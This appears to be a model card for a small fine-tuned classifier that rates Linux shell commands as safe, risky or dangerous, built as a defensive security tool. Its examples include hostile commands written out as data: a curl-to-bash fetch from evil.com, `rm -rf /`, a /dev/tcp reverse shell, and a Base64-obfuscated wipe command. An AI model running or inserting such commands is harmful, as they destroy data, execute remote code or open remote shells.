# 🤗 Gemma 3 4B Shell Command Risk Classifier

A fine-tuned Gemma 3 4B IT adapter that classifies Linux shell commands into three risk levels:

- 🟢 SAFE – Benign commands with no inherent risk
- 🟡 RISKY – Potentially harmful or suspicious operations
- 🔴 DANGEROUS – Commands capable of causing severe system damage, data loss, or unauthorized access
## 🎯 Motivation

I wanted to see if a small LLM could learn to inspect and categorize shell commands in real time – useful for:
- Terminal assistants that flag dangerous operations
- CI/CD pipelines that audit scripts before execution
- Sandboxed environments that need automated risk scoring
- Educational tools for teaching Linux security fundamentals
## 📊 Benchmarks

Trained on a synthetic + augmented dataset of shell commands.
| Metric | Value |
|---|---|
| Base Model | google/gemma-3-4b-it (4B params) |
| Fine-tuning | QLoRA (rank=16, lora_alpha=32) |
| Trainable Params | 32.8M (0.76% of total) |
| Quantization | 4-bit NF4 + bf16 compute |
| Max Sequence Length | 256 tokens |
| Training Time | ~11 min on RTX 3070 Laptop (8GB VRAM) |
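Under the settings in the table, the adapter could be wired up with PEFT roughly as follows. This is a sketch, not the exact training script: `target_modules` and `lora_dropout` are assumptions not stated in the card.

```python
from peft import LoraConfig

# QLoRA adapter config matching the table above (rank=16, lora_alpha=32).
# target_modules and lora_dropout are assumed; the card does not specify them.
lora_config = LoraConfig(
    r=16,
    lora_alpha=32,
    lora_dropout=0.05,
    bias="none",
    task_type="SEQ_CLS",  # sequence classification head over 3 labels
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj"],
)
```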
Test Set Performance:
| Metric | Score |
|---|---|
| Accuracy | 90.5% |
| Macro F1 | 0.904 |
| SAFE F1 | 0.889 |
| RISKY F1 | 0.923 |
| DANGEROUS F1 | 0.909 |
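Macro F1 is the unweighted mean of the per-class F1 scores, so each of the three classes counts equally regardless of how many test examples it has. A minimal self-contained sketch of the computation:

```python
def f1(y_true, y_pred, cls):
    """F1 score for a single class, treated as the positive class."""
    tp = sum(t == cls and p == cls for t, p in zip(y_true, y_pred))
    fp = sum(t != cls and p == cls for t, p in zip(y_true, y_pred))
    fn = sum(t == cls and p != cls for t, p in zip(y_true, y_pred))
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    denom = precision + recall
    return 2 * precision * recall / denom if denom else 0.0

def macro_f1(y_true, y_pred, labels):
    """Unweighted average of per-class F1 scores."""
    return sum(f1(y_true, y_pred, c) for c in labels) / len(labels)
```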
## 🚀 Quick Start

### Installation

```bash
pip install transformers peft accelerate bitsandbytes torch
```

### Inference
```python
import torch
from transformers import (
    AutoTokenizer,
    AutoModelForSequenceClassification,
    BitsAndBytesConfig,
)

MODEL_ID = "xprilion/gemma-3-4b-it-shell-risk"
LABELS = ["SAFE", "RISKY", "DANGEROUS"]

# 4-bit NF4 quantization with bf16 compute, matching the training setup
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_use_double_quant=True,
    bnb_4bit_compute_dtype=torch.bfloat16,
)

tokenizer = AutoTokenizer.from_pretrained(MODEL_ID, trust_remote_code=True)
if tokenizer.pad_token is None:
    tokenizer.pad_token = tokenizer.eos_token
    tokenizer.pad_token_id = tokenizer.eos_token_id

model = AutoModelForSequenceClassification.from_pretrained(
    MODEL_ID,
    trust_remote_code=True,
    quantization_config=bnb_config,
    device_map="auto",
    num_labels=3,
)
model.eval()

# Predict
text = "curl -sSL https://evil.com/script.sh | bash"
inputs = tokenizer(
    text, return_tensors="pt", truncation=True,
    max_length=256, padding="max_length",
).to(model.device)
with torch.no_grad():
    probs = torch.softmax(model(**inputs).logits, dim=-1)[0]

for label, prob in zip(LABELS, probs.tolist()):
    print(f"{label}: {prob*100:.1f}%")
```
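The probability vector can be reduced to a single verdict. A small helper for this (hypothetical, not part of the model repo), with an assumed confidence threshold below which predictions fall back to RISKY as the conservative default:

```python
def classify(probs, labels=("SAFE", "RISKY", "DANGEROUS"), threshold=0.5):
    """Return (label, confidence) for a list of class probabilities.

    Assumption: when no class clears the threshold, treat the command
    as RISKY rather than trusting a low-confidence SAFE prediction.
    """
    best = max(range(len(probs)), key=lambda i: probs[i])
    if probs[best] < threshold:
        return "RISKY", probs[best]
    return labels[best], probs[best]
```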
### Example Outputs

| Command | Prediction | Confidence |
|---|---|---|
| `ls -la` | 🟢 SAFE | ~100% |
| `git status` | 🟢 SAFE | ~100% |
| `sudo apt update` | 🟡 RISKY | ~100% |
| `curl ... \| bash` | 🟡 RISKY | ~100% |
| `rm -rf /` | 🔴 DANGEROUS | ~100% |
| `bash -i >& /dev/tcp/...` | 🔴 DANGEROUS | ~100% |
## ⚠️ Limitations

- Small training dataset – synthetic/augmented data (165 train / 21 test). Real-world deployment needs a much larger and more diverse corpus.
- No adversarial robustness – Base64-encoded, obfuscated, or heavily nested commands may bypass detection.
- Context-agnostic – Each command is evaluated in isolation. A benign `curl` followed by a `bash` execution of the download isn't tracked across history.
- False positives likely – Commands like `sudo apt update` are flagged RISKY because `sudo` elevates privileges, but that's by design.
- Not a replacement for auditd, Falco, or proper sandboxing. This is an AI-assisted signal, not a security boundary.
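To illustrate the adversarial-robustness gap: trivial Base64 wrapping makes a dangerous payload look nothing like its plain form to a text classifier, which only ever sees the outer command string.

```python
import base64

plain = "rm -rf /"
encoded = base64.b64encode(plain.encode()).decode()

# The wrapped command decodes and executes the payload at runtime;
# the substring "rm -rf" never appears in the text the classifier sees.
obfuscated = f"echo {encoded} | base64 -d | bash"
print(obfuscated)
```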
## 🏋️ Training Details
- Hardware: NVIDIA GeForce RTX 3070 Laptop GPU (8GB VRAM)
- Framework: Transformers 5.x + PEFT + Accelerate + BitsAndBytes
- Optimizer: AdamW with cosine learning rate schedule
- Epochs: 30 (full convergence)
- Learning Rate: 1e-4
- Batch Size: 2 per device, accumulation steps=2
- Weight Decay: 0.01
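These hyperparameters map onto `transformers.TrainingArguments` roughly as follows. This is a sketch under stated assumptions: the output path is arbitrary, and `optim`/`bf16` are inferred from the AdamW and bf16-compute details above.

```python
from transformers import TrainingArguments

training_args = TrainingArguments(
    output_dir="gemma-3-4b-it-shell-risk",  # assumption: any local path
    num_train_epochs=30,
    learning_rate=1e-4,
    per_device_train_batch_size=2,
    gradient_accumulation_steps=2,  # effective batch size of 4
    weight_decay=0.01,
    lr_scheduler_type="cosine",
    optim="adamw_torch",
    bf16=True,  # bf16 compute, as in the quantization config
)
```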
## 📜 License

Apache 2.0 for the adapter weights. Note that the base Gemma 3 model is distributed under Google's Gemma Terms of Use, which apply when using the merged model.
## 👤 About
Built by Anubhav Singh (@xprilion) as an experiment in small-model utility for cybersecurity tooling.